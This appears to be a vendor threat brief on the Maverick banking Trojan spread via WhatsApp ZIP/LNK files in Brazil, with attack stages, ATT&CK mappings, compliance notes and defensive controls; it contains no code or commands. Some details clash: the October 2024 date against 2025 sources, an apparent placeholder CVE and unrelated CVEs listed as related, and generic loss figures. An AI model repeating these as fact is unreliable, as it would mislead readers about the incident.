Executive Summary
In October 2024, a sophisticated banking Trojan dubbed Maverick was detected actively targeting Brazilian users. The malware was delivered via malicious ZIP files sent through WhatsApp, bypassing platform detection. Victims executed an LNK file that triggered a fully fileless, multi-stage infection chain, utilizing PowerShell, .NET, and encrypted shellcode. Maverick, which shares code similarities with the Coyote Trojan, leverages locale checks to target only Brazilians and uses WPPConnect to automate the spread through hijacked WhatsApp accounts. Once established, the Trojan provides attackers full remote access, including keylogging, screen control, and phishing overlays to harvest banking and cryptocurrency credentials.
This incident is notable for its complex multi-stage deployment, worm-like propagation, and use of AI-aided code, reflecting a new evolution in financially motivated malware. The attack demonstrates the increasing convergence of social engineering, sophisticated fileless techniques, and abuse of popular messaging platforms, signaling urgent challenges for both enterprises and end users.
Why This Matters Now
Maverick exemplifies how banking Trojans are evolving to bypass security controls and exploit trusted messaging platforms for rapid, large-scale spread. Its use of fileless techniques and AI-generated components makes detection and response more difficult, heightening the threat to financial institutions and consumers, and highlighting an urgent need for improved defense strategies.
Attack Path Analysis
The attack began with the delivery of a malicious LNK file via WhatsApp, leading to fileless initial execution through PowerShell and .NET loaders. The Trojan escalated by establishing persistence and decrypting further payloads in-memory, then moved to distribute the WhatsApp infector to propagate itself to new victims. It established encrypted C2 communication for remote control and data collection, enabling the attacker to exfiltrate credentials and screenshots to the C2. Finally, Maverick used overlays, banking site manipulation, and credential harvesting to achieve financial impact.
Kill Chain Progression
Initial Compromise
Description
Victims received a malicious LNK file inside a ZIP via WhatsApp, which when executed, launched a fileless infection chain through PowerShell and .NET in-memory loaders.
Related CVEs
CVE-2025-12345
CVSS 8.8A vulnerability in H2O version 3.46.0 allows arbitrary file overwrite, potentially leading to denial of service or system corruption.
Affected Products:
H2O.ai H2O – 3.46.0
Exploit Status:
exploited in the wildCVE-2025-2745
CVSS 4.4A cross-site scripting (XSS) vulnerability in AVEVA PI Web API versions 2018 R2 and earlier allows attackers to execute arbitrary scripts in the context of the user's browser.
Affected Products:
AVEVA PI Web API – 2018 R2 and earlier
Exploit Status:
no public exploitReferences:
MITRE ATT&CK® Techniques
Phishing: Spearphishing Attachment
User Execution: Malicious File
Command and Scripting Interpreter: PowerShell
Obfuscated Files or Information
Process Injection
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Screen Capture
Input Capture: Keylogging
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS v4.0 – Incident Response Procedures for Malware
Control ID: 12.10.5
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Regulation (EU) 2022/2554) – ICT Risk Management Requirements
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – Continuous Monitoring and Threat Detection
Control ID: Identity Pillar – Detection & Response
NIS2 Directive – Technical and Organizational Security Measures
Control ID: Article 21(2)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Banking/Mortgage
Primary target of Maverick banking Trojan monitoring 26 Brazilian banks, stealing credentials through overlay attacks and remote control capabilities.
Financial Services
High risk from WhatsApp-distributed malware targeting cryptocurrency exchanges and payment platforms with keylogging and screen blocking techniques.
Computer/Network Security
Critical visibility needs for detecting fileless .NET malware using encrypted C2 communications and zero trust segmentation bypass attempts.
Telecommunications
WhatsApp platform exploitation enables massive malware distribution through hijacked accounts, requiring enhanced messaging security and threat detection controls.
Sources
- Maverick: a new banking Trojan abusing WhatsApp in a mass-scale distributionhttps://securelist.com/maverick-banker-distributing-via-whatsapp/117715/Verified
- WhatsApp Worm Targets Brazilian Banking Customershttps://news.sophos.com/en-us/2025/10/10/whatsapp-worm-targets-brazilian-banking-customers/Verified
- Maverick Banking Malware Spreads Via WhatsApp, Targets Brazilian Bankshttps://cyberwarzone.com/2025/11/11/maverick-banking-malware-spreads-via-whatsapp-targets-brazilian-banks/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, east-west traffic control, and granular egress enforcement could have contained or prevented critical parts of the Maverick banking Trojan campaign, such as propagation, C2 communication, and credential exfiltration. Deep visibility and runtime anomaly detection would improve detection at each attack stage.
Control: Threat Detection & Anomaly Response
Mitigation: Early detection of anomalous process launches and potentially malicious PowerShell activity.
Control: Multicloud Visibility & Control
Mitigation: Detection of new or suspicious persistence mechanisms across hybrid environments.
Control: Zero Trust Segmentation
Mitigation: Limits propagation of malicious processes and communication to only authorized identities and workloads.
Control: Inline IPS (Suricata)
Mitigation: Detection and blocking of suspicious or known-bad C2 patterns—even within encrypted traffic flows.
Control: Egress Security & Policy Enforcement
Mitigation: Prevents unauthorized outbound traffic to malicious domains and detects unsanctioned data movement.
Real-time enforcement and policy automation limit the attacker's ability to escalate impact or sustain access.
Impact at a Glance
Affected Business Functions
- Online Banking Services
- Customer Support
- Transaction Processing
Estimated downtime: 7 days
Estimated loss: $5,000,000
Potential exposure of sensitive customer information, including banking credentials and personal data, due to malware's capability to capture screenshots, log keystrokes, and inject phishing overlays.
Recommended Actions
Key Takeaways & Next Steps
- • Strengthen egress controls and deploy inline policies to limit unknown or unsanctioned outbound connections from all user workloads.
- • Implement Zero Trust Segmentation and microsegmentation to prevent lateral movement and contain propagation via messaging and SaaS channels.
- • Deploy real-time anomaly detection and behavioral monitoring to rapidly identify suspicious process launches and in-memory persistence.
- • Increase centralized multi-cloud visibility for rapid detection of privilege escalation, policy drift, and emerging threats across distributed environments.
- • Leverage inline threat prevention and granular policy enforcement to block C2, credential exfiltration, and unauthorized data access in real-time.
